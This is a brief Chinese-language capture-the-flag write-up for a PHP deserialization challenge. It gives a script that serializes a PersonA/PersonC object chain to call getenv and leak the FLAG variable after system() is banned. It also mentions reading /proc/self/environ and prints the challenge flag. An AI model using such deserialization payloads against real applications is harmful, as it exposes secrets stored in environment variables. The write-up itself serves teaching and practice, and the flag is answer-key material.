跳转至

Web-19-1|第十九章_revenge

碎碎念

反序列化 4.0

Writeup

题目把 system 给 ban 了,我们可以换个方法获取环境变量:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class PersonA {
    public $name;
    public $id;
    public $age;
}
class PersonC {
    public $name;
    public $id;
    public $age;
}

$pc = new PersonC();
$pc->name = 'getenv';
$pc->age = "";
$pa = new PersonA();
$pa->name = $pc;
$pa->id = 'Check';
$pa->age = 'FLAG';
echo urlencode(serialize($pa));
?>

P.S. 也可以用 file_get_contents(/proc/self/environ)

得到 flag:moectf{7d2a95e7-9ec5-643a-c416-a7b9e15c0403}

💬 评论

评论系统加载中...